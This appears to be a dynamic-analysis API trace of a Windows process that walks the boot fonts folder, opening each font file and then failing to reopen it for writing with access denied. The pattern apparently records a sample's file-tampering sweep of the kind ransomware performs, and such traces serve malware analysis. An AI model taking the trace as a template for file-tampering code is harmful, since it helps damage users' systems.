[0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.697] AreFileApisANSI () returned 1 [0069.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\cht_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.698] AreFileApisANSI () returned 1 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78410 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78410, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0069.698] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.699] GetFileType (hFile=0x41c) returned 0x1 [0069.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78410 | out: hHeap=0x20000) returned 1 [0069.699] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.699] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.700] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.700] CloseHandle (hObject=0x41c) returned 1 [0069.700] AreFileApisANSI () returned 1 [0069.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78150 [0069.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78150, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0069.700] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.700] GetLastError () returned 0x5 [0069.700] GetLastError () returned 0x5 [0069.700] SetLastError (dwErrCode=0x5) [0069.700] GetLastError () returned 0x5 [0069.700] SetLastError (dwErrCode=0x5) [0069.700] GetLastError () returned 0x5 [0069.700] SetLastError (dwErrCode=0x5) [0069.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78150 | out: hHeap=0x20000) returned 1 [0069.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.702] AreFileApisANSI () returned 1 [0069.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\jpn_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0069.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.702] AreFileApisANSI () returned 1 [0069.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78690 [0069.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x78690, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0069.702] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.704] GetFileType (hFile=0x41c) returned 0x1 [0069.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78690 | out: hHeap=0x20000) returned 1 [0069.704] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.705] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.705] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.705] CloseHandle (hObject=0x41c) returned 1 [0069.705] AreFileApisANSI () returned 1 [0069.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0069.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0069.705] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.705] GetLastError () returned 0x5 [0069.705] GetLastError () returned 0x5 [0069.705] SetLastError (dwErrCode=0x5) [0069.705] GetLastError () returned 0x5 [0069.705] SetLastError (dwErrCode=0x5) [0069.705] GetLastError () returned 0x5 [0069.706] SetLastError (dwErrCode=0x5) [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.707] AreFileApisANSI () returned 1 [0069.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\kor_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0069.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.707] AreFileApisANSI () returned 1 [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78550 [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78550, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0069.707] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.709] GetFileType (hFile=0x41c) returned 0x1 [0069.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78550 | out: hHeap=0x20000) returned 1 [0069.709] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.709] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.709] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.710] CloseHandle (hObject=0x41c) returned 1 [0069.710] AreFileApisANSI () returned 1 [0069.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x785d0 [0069.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x785d0, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0069.710] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.710] GetLastError () returned 0x5 [0069.710] GetLastError () returned 0x5 [0069.710] SetLastError (dwErrCode=0x5) [0069.710] GetLastError () returned 0x5 [0069.710] SetLastError (dwErrCode=0x5) [0069.710] GetLastError () returned 0x5 [0069.710] SetLastError (dwErrCode=0x5) [0069.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x785d0 | out: hHeap=0x20000) returned 1 [0069.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.710] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 